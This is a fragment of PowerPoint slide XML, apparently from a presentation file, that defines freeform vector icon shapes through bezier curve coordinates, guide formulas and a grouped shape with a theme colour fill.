                    <a:pt x="55" y="304"/>
                    <a:pt x="58" y="307"/>
                    <a:pt x="62" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="309"/>
                    <a:pt x="67" y="309"/>
                    <a:pt x="70" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="309"/>
                    <a:pt x="289" y="309"/>
                    <a:pt x="289" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="309"/>
                    <a:pt x="314" y="321"/>
                    <a:pt x="314" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="349"/>
                    <a:pt x="303" y="360"/>
                    <a:pt x="289" y="3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4" name="Freeform 385">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27099471-6647-46EA-8D05-401DDE396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9600" y="782638"/>
              <a:ext cx="196850" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 444 w 469"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 26 w 469"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 469"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 26 w 469"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 444 w 469"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 469 w 469"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 444 w 469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9" h="50">
                  <a:moveTo>
                    <a:pt x="444" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="50"/>
                    <a:pt x="26" y="50"/>
                    <a:pt x="26" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="50"/>
                    <a:pt x="0" y="39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444" y="0"/>
                    <a:pt x="444" y="0"/>
                    <a:pt x="444" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="458" y="0"/>
                    <a:pt x="469" y="11"/>
                    <a:pt x="469" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="469" y="39"/>
                    <a:pt x="458" y="50"/>
                    <a:pt x="444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5" name="Freeform 386">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24AA08A-B145-462B-8AB7-CCFA13D345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275" y="439738"/>
              <a:ext cx="68263" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 135 w 160"/>
                <a:gd name="T1" fmla="*/ 310 h 310"/>
                <a:gd name="T2" fmla="*/ 115 w 160"/>
                <a:gd name="T3" fmla="*/ 297 h 310"/>
                <a:gd name="T4" fmla="*/ 5 w 160"/>
                <a:gd name="T5" fmla="*/ 34 h 310"/>
                <a:gd name="T6" fmla="*/ 17 w 160"/>
                <a:gd name="T7" fmla="*/ 5 h 310"/>
                <a:gd name="T8" fmla="*/ 46 w 160"/>
                <a:gd name="T9" fmla="*/ 17 h 310"/>
                <a:gd name="T10" fmla="*/ 156 w 160"/>
                <a:gd name="T11" fmla="*/ 280 h 310"/>
                <a:gd name="T12" fmla="*/ 144 w 160"/>
                <a:gd name="T13" fmla="*/ 309 h 310"/>
                <a:gd name="T14" fmla="*/ 135 w 160"/>
                <a:gd name="T15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0" h="310">
                  <a:moveTo>
                    <a:pt x="135" y="310"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="310"/>
                    <a:pt x="119" y="305"/>
                    <a:pt x="115" y="297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0" y="23"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="17" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="0"/>
                    <a:pt x="41" y="6"/>
                    <a:pt x="46" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="280"/>
                    <a:pt x="156" y="280"/>
                    <a:pt x="156" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="291"/>
                    <a:pt x="155" y="304"/>
                    <a:pt x="144" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="310"/>
                    <a:pt x="138" y="310"/>
                    <a:pt x="135" y="3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6" name="Freeform 387">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{137E3E0E-A941-4238-B102-8DA49EB26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863" y="441325"/>
              <a:ext cx="138113" cy="19050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 307 w 329"/>
                <a:gd name="T1" fmla="*/ 44 h 44"/>
                <a:gd name="T2" fmla="*/ 22 w 329"/>
                <a:gd name="T3" fmla="*/ 44 h 44"/>
                <a:gd name="T4" fmla="*/ 0 w 329"/>
                <a:gd name="T5" fmla="*/ 22 h 44"/>
                <a:gd name="T6" fmla="*/ 22 w 329"/>
                <a:gd name="T7" fmla="*/ 0 h 44"/>
                <a:gd name="T8" fmla="*/ 307 w 329"/>
                <a:gd name="T9" fmla="*/ 0 h 44"/>
                <a:gd name="T10" fmla="*/ 329 w 329"/>
                <a:gd name="T11" fmla="*/ 22 h 44"/>
                <a:gd name="T12" fmla="*/ 307 w 329"/>
                <a:gd name="T13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9" h="44">
                  <a:moveTo>
                    <a:pt x="307" y="44"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="44"/>
                    <a:pt x="22" y="44"/>
                    <a:pt x="22" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="44"/>
                    <a:pt x="0" y="35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07" y="0"/>
                    <a:pt x="307" y="0"/>
                    <a:pt x="307" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="0"/>
                    <a:pt x="329" y="10"/>
                    <a:pt x="329" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="35"/>
                    <a:pt x="319" y="44"/>
                    <a:pt x="307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7" name="Freeform 388">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E96772C-8008-4EE7-BFEF-0A526F38D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1800" y="325438"/>
              <a:ext cx="257175" cy="254000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 307 w 614"/>
                <a:gd name="T1" fmla="*/ 605 h 605"/>
                <a:gd name="T2" fmla="*/ 0 w 614"/>
                <a:gd name="T3" fmla="*/ 298 h 605"/>
                <a:gd name="T4" fmla="*/ 224 w 614"/>
                <a:gd name="T5" fmla="*/ 3 h 605"/>
                <a:gd name="T6" fmla="*/ 251 w 614"/>
                <a:gd name="T7" fmla="*/ 18 h 605"/>
                <a:gd name="T8" fmla="*/ 236 w 614"/>
                <a:gd name="T9" fmla="*/ 45 h 605"/>
                <a:gd name="T10" fmla="*/ 44 w 614"/>
                <a:gd name="T11" fmla="*/ 298 h 605"/>
                <a:gd name="T12" fmla="*/ 307 w 614"/>
                <a:gd name="T13" fmla="*/ 561 h 605"/>
                <a:gd name="T14" fmla="*/ 570 w 614"/>
                <a:gd name="T15" fmla="*/ 298 h 605"/>
                <a:gd name="T16" fmla="*/ 479 w 614"/>
                <a:gd name="T17" fmla="*/ 99 h 605"/>
                <a:gd name="T18" fmla="*/ 477 w 614"/>
                <a:gd name="T19" fmla="*/ 68 h 605"/>
                <a:gd name="T20" fmla="*/ 508 w 614"/>
                <a:gd name="T21" fmla="*/ 66 h 605"/>
                <a:gd name="T22" fmla="*/ 614 w 614"/>
                <a:gd name="T23" fmla="*/ 298 h 605"/>
                <a:gd name="T24" fmla="*/ 307 w 614"/>
                <a:gd name="T25" fmla="*/ 605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4" h="605">
                  <a:moveTo>
                    <a:pt x="307" y="605"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="605"/>
                    <a:pt x="0" y="468"/>
                    <a:pt x="0" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="161"/>
                    <a:pt x="92" y="40"/>
                    <a:pt x="224" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="0"/>
                    <a:pt x="248" y="6"/>
                    <a:pt x="251" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254" y="30"/>
                    <a:pt x="248" y="42"/>
                    <a:pt x="236" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="77"/>
                    <a:pt x="44" y="181"/>
                    <a:pt x="44" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="443"/>
                    <a:pt x="162" y="561"/>
                    <a:pt x="307" y="561"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="561"/>
                    <a:pt x="570" y="443"/>
                    <a:pt x="570" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="570" y="222"/>
                    <a:pt x="537" y="149"/>
                    <a:pt x="479" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="91"/>
                    <a:pt x="469" y="78"/>
                    <a:pt x="477" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="59"/>
                    <a:pt x="499" y="58"/>
                    <a:pt x="508" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="575" y="124"/>
                    <a:pt x="614" y="209"/>
                    <a:pt x="614" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="614" y="468"/>
                    <a:pt x="477" y="605"/>
                    <a:pt x="307" y="6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8" name="Freeform 389">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5449307A-0EB0-4917-80D6-320666F97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275" y="439738"/>
              <a:ext cx="122238" cy="84138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 265 w 290"/>
                <a:gd name="T1" fmla="*/ 201 h 201"/>
                <a:gd name="T2" fmla="*/ 253 w 290"/>
                <a:gd name="T3" fmla="*/ 197 h 201"/>
                <a:gd name="T4" fmla="*/ 13 w 290"/>
                <a:gd name="T5" fmla="*/ 44 h 201"/>
                <a:gd name="T6" fmla="*/ 7 w 290"/>
                <a:gd name="T7" fmla="*/ 13 h 201"/>
                <a:gd name="T8" fmla="*/ 37 w 290"/>
                <a:gd name="T9" fmla="*/ 7 h 201"/>
                <a:gd name="T10" fmla="*/ 277 w 290"/>
                <a:gd name="T11" fmla="*/ 160 h 201"/>
                <a:gd name="T12" fmla="*/ 284 w 290"/>
                <a:gd name="T13" fmla="*/ 190 h 201"/>
                <a:gd name="T14" fmla="*/ 265 w 290"/>
                <a:gd name="T15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0" h="201">
                  <a:moveTo>
                    <a:pt x="265" y="201"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="261" y="201"/>
                    <a:pt x="257" y="199"/>
                    <a:pt x="253" y="197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3" y="37"/>
                    <a:pt x="0" y="24"/>
                    <a:pt x="7" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="37" y="7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87" y="166"/>
                    <a:pt x="290" y="180"/>
                    <a:pt x="284" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="197"/>
                    <a:pt x="273" y="201"/>
                    <a:pt x="265" y="2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49" name="Freeform 390">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2571F273-3275-4D3A-88A7-1BD1E043D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863" y="322263"/>
              <a:ext cx="19050" cy="138113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 22 w 44"/>
                <a:gd name="T1" fmla="*/ 330 h 330"/>
                <a:gd name="T2" fmla="*/ 0 w 44"/>
                <a:gd name="T3" fmla="*/ 308 h 330"/>
                <a:gd name="T4" fmla="*/ 0 w 44"/>
                <a:gd name="T5" fmla="*/ 22 h 330"/>
                <a:gd name="T6" fmla="*/ 22 w 44"/>
                <a:gd name="T7" fmla="*/ 0 h 330"/>
                <a:gd name="T8" fmla="*/ 22 w 44"/>
                <a:gd name="T9" fmla="*/ 0 h 330"/>
                <a:gd name="T10" fmla="*/ 44 w 44"/>
                <a:gd name="T11" fmla="*/ 22 h 330"/>
                <a:gd name="T12" fmla="*/ 44 w 44"/>
                <a:gd name="T13" fmla="*/ 308 h 330"/>
                <a:gd name="T14" fmla="*/ 22 w 44"/>
                <a:gd name="T15" fmla="*/ 33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30">
                  <a:moveTo>
                    <a:pt x="22" y="330"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="330"/>
                    <a:pt x="0" y="321"/>
                    <a:pt x="0" y="308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4" y="0"/>
                    <a:pt x="44" y="10"/>
                    <a:pt x="44" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="308"/>
                    <a:pt x="44" y="308"/>
                    <a:pt x="44" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="321"/>
                    <a:pt x="34" y="330"/>
                    <a:pt x="22" y="3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0" name="Freeform 391">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB3D25B4-690D-45DB-B499-A7829AB00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0863" y="322263"/>
              <a:ext cx="98425" cy="47625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 208 w 233"/>
                <a:gd name="T1" fmla="*/ 114 h 114"/>
                <a:gd name="T2" fmla="*/ 194 w 233"/>
                <a:gd name="T3" fmla="*/ 108 h 114"/>
                <a:gd name="T4" fmla="*/ 22 w 233"/>
                <a:gd name="T5" fmla="*/ 44 h 114"/>
                <a:gd name="T6" fmla="*/ 0 w 233"/>
                <a:gd name="T7" fmla="*/ 22 h 114"/>
                <a:gd name="T8" fmla="*/ 22 w 233"/>
                <a:gd name="T9" fmla="*/ 0 h 114"/>
                <a:gd name="T10" fmla="*/ 223 w 233"/>
                <a:gd name="T11" fmla="*/ 75 h 114"/>
                <a:gd name="T12" fmla="*/ 225 w 233"/>
                <a:gd name="T13" fmla="*/ 106 h 114"/>
                <a:gd name="T14" fmla="*/ 208 w 233"/>
                <a:gd name="T15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114">
                  <a:moveTo>
                    <a:pt x="208" y="114"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="114"/>
                    <a:pt x="198" y="112"/>
                    <a:pt x="194" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="67"/>
                    <a:pt x="85" y="44"/>
                    <a:pt x="22" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="44"/>
                    <a:pt x="0" y="34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96" y="0"/>
                    <a:pt x="167" y="27"/>
                    <a:pt x="223" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="83"/>
                    <a:pt x="233" y="97"/>
                    <a:pt x="225" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="111"/>
                    <a:pt x="214" y="114"/>
                    <a:pt x="208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1" name="Freeform 392">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27938060-D6F1-4DB0-B9C9-C28992E0139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525" y="322263"/>
              <a:ext cx="52388" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 124"/>
                <a:gd name="T1" fmla="*/ 55 h 55"/>
                <a:gd name="T2" fmla="*/ 3 w 124"/>
                <a:gd name="T3" fmla="*/ 39 h 55"/>
                <a:gd name="T4" fmla="*/ 19 w 124"/>
                <a:gd name="T5" fmla="*/ 12 h 55"/>
                <a:gd name="T6" fmla="*/ 102 w 124"/>
                <a:gd name="T7" fmla="*/ 0 h 55"/>
                <a:gd name="T8" fmla="*/ 124 w 124"/>
                <a:gd name="T9" fmla="*/ 22 h 55"/>
                <a:gd name="T10" fmla="*/ 102 w 124"/>
                <a:gd name="T11" fmla="*/ 44 h 55"/>
                <a:gd name="T12" fmla="*/ 31 w 124"/>
                <a:gd name="T13" fmla="*/ 54 h 55"/>
                <a:gd name="T14" fmla="*/ 25 w 124"/>
                <a:gd name="T15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4" h="55">
                  <a:moveTo>
                    <a:pt x="25" y="55"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="55"/>
                    <a:pt x="6" y="49"/>
                    <a:pt x="3" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="7" y="15"/>
                    <a:pt x="19" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="4"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="0"/>
                    <a:pt x="124" y="10"/>
                    <a:pt x="124" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="34"/>
                    <a:pt x="114" y="44"/>
                    <a:pt x="102" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="44"/>
                    <a:pt x="54" y="48"/>
                    <a:pt x="31" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="55"/>
                    <a:pt x="27" y="55"/>
                    <a:pt x="25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2" name="Freeform 393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBC835F8-ECEA-461D-9951-428E90DB3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97400" y="325438"/>
              <a:ext cx="225425" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 510 w 535"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 26 w 535"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 535"/>
                <a:gd name="T5" fmla="*/ 26 h 51"/>
                <a:gd name="T6" fmla="*/ 26 w 535"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 510 w 535"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 535 w 535"/>
                <a:gd name="T11" fmla="*/ 26 h 51"/>
                <a:gd name="T12" fmla="*/ 510 w 535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5" h="51">
                  <a:moveTo>
                    <a:pt x="510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510" y="0"/>
                    <a:pt x="510" y="0"/>
                    <a:pt x="510" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="0"/>
                    <a:pt x="535" y="12"/>
                    <a:pt x="535" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="535" y="40"/>
                    <a:pt x="524" y="51"/>
                    <a:pt x="51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3" name="Freeform 394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{885192AC-26CC-4D8C-8C59-628EF4827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5025" y="382588"/>
              <a:ext cx="177800" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 400 w 425"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 425"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 425"/>
                <a:gd name="T5" fmla="*/ 25 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 425"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 400 w 425"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 425 w 425"/>
                <a:gd name="T11" fmla="*/ 25 h 51"/>
                <a:gd name="T12" fmla="*/ 400 w 425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5" h="51">
                  <a:moveTo>
                    <a:pt x="400" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBez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400" y="0"/>
                    <a:pt x="400" y="0"/>
                    <a:pt x="400" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="0"/>
                    <a:pt x="425" y="11"/>
                    <a:pt x="425" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="39"/>
                    <a:pt x="414" y="51"/>
                    <a:pt x="400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4" name="Freeform 395">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C0EF832-A664-463F-9908-54CBAE70D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9000" y="495300"/>
              <a:ext cx="123825" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 268 w 293"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 26 w 293"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 293"/>
                <a:gd name="T5" fmla="*/ 26 h 51"/>
                <a:gd name="T6" fmla="*/ 26 w 293"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 268 w 293"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 293 w 293"/>
                <a:gd name="T11" fmla="*/ 26 h 51"/>
                <a:gd name="T12" fmla="*/ 268 w 293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" h="51">
                  <a:moveTo>
                    <a:pt x="268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82" y="0"/>
                    <a:pt x="293" y="12"/>
                    <a:pt x="293" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="40"/>
                    <a:pt x="282" y="51"/>
                    <a:pt x="26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5" name="Freeform 396">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{245C6C1D-F4C8-4110-8796-0ED76892C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4563" y="439738"/>
              <a:ext cx="68263" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 137 w 162"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 162"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 162"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 162"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 137 w 162"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 162 w 162"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 137 w 162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50">
                  <a:moveTo>
                    <a:pt x="137" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50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51" y="0"/>
                    <a:pt x="162" y="11"/>
                    <a:pt x="162" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="39"/>
                    <a:pt x="151" y="50"/>
                    <a:pt x="13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6" name="Freeform 397">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C806C91-3F53-4505-9078-019D4DCAD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2013" y="439738"/>
              <a:ext cx="68263" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 137 w 162"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 26 w 162"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 162"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 26 w 162"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 137 w 162"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 162 w 162"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 137 w 162"/>
                <a:gd name="T13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50">
                  <a:moveTo>
                    <a:pt x="137" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="50"/>
                    <a:pt x="26" y="50"/>
                    <a:pt x="26" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="50"/>
                    <a:pt x="0" y="39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51" y="0"/>
                    <a:pt x="162" y="11"/>
                    <a:pt x="162" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="39"/>
                    <a:pt x="151" y="50"/>
                    <a:pt x="13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57" name="Freeform 398">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67621687-9BAC-4160-85E7-9FD2FF1DB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9000" y="552450"/>
              <a:ext cx="123825" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 268 w 293"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 26 w 293"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 293"/>
                <a:gd name="T5" fmla="*/ 25 h 51"/>
                <a:gd name="T6" fmla="*/ 26 w 293"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 268 w 293"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 293 w 293"/>
                <a:gd name="T11" fmla="*/ 25 h 51"/>
                <a:gd name="T12" fmla="*/ 268 w 293"/>
                <a:gd name="T13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3" h="51">
                  <a:moveTo>
                    <a:pt x="268" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="51"/>
                    <a:pt x="26" y="51"/>
                    <a:pt x="26" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="51"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="25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82" y="0"/>
                    <a:pt x="293" y="11"/>
                    <a:pt x="293" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="39"/>
                    <a:pt x="282" y="51"/>
                    <a:pt x="26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358" name="Group 1053">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9340A92-2AFE-4710-9924-AF9B2761441F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3385116" y="2984482"/>
            <a:ext cx="755335" cy="679468"/>
            <a:chOff x="17656176" y="9586416"/>
            <a:chExt cx="711194" cy="639763"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="359" name="Freeform 1008">
